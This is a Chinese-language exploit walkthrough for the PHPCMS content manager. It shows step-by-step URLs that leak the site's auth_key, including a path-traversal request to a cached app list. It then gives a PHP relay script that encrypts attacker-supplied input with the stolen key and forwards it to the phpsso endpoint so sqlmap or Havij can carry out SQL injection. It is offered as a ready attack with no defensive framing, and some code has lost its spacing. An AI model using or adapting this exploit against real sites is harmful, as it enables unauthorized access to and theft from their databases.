phpcms获取auth_key漏洞

1. 

为所欲为漏洞：

注册登录后访问

http://localhost:8038/study/phpcms/index.php?m=member&c=index&a=account_manage_avatar&t=1



查看源文件：

 
 
拿到这个： 
 
 
 
aHR0cDovL2xvY2FsaG9zdDo4MDM4L3N0dWR5L3BocGNtcy9waHBzc29fc2VydmVyL2luZGV4LnBocD9tPXBocHNzbyZjPWluZGV4JmE9dXBsb2FkYXZhdGFyJmF1dGhfZGF0YT12PTEmYXBwaWQ9MSZkYXRhPWU1YzJWQU1HVVFaUkFRa0lVUVFLVndGVUFnSUNWZ0FJQWxkVkJRRkREUVZjVjBNVVFHa0FReFZaWmxNRUdBOSUyQkRqWm9LMUFIUm1Vd0JHY09YVzVVRGdRaEpEeGFlUVZuR0FkeFZSY0tRQQ== 
 
 
 
解除base64_decode编码得 
 
 
 
http://localhost:8038/study/phpcms/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9%2BDjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQA 
 
 
 
将url里的uploadavatar换成：getapplist得： 
 

http://localhost:8038/study/phpcms/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9%2BDjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQA

2.

http://www.test.org/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin

中转完直接sqlmap或者havij。sqlmap用中转非常不好用。不信你试试。

中转脚本：

<?php

set_time_limit(0);

$wang_url= 'http://www.0day5.com';

 

$auth_key= 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx';

 

$str= "uid=1".stripslashes($_GET['id']);

$encode= sys_auth($str, 'ENCODE', $auth_key);

$content= file_get_contents($wang_url."/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=".$encode);

echo$content;

functionsys_auth($string, $operation= 'ENCODE', $key= '', $expiry= 0) {

         $key_length= 4;

         $key= md5($key);

         $fixedkey= hash('md5', $key);

         $egiskeys= md5(substr($fixedkey, 16, 16));

         $runtokey= $key_length? ($operation== 'ENCODE'? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';

         $keys= hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));

         $string= $operation== 'ENCODE'? sprintf('%010d', $expiry? $expiry+ time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string: base64_decode(substr($string, $key_length));

         $i= 0; $result= '';

         $string_length= strlen($string);

         for($i= 0; $i< $string_length; $i++){

                   $result.= chr(ord($string{$i}) ^ ord($keys{$i% 32}));

         }

         if($operation== 'ENCODE') {

                   return$runtokey. str_replace('=', '', base64_encode($result));

         } else{

                   if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {

                            returnsubstr($result, 26);

                   } else{

                            return'';

                   }

         }

}

?>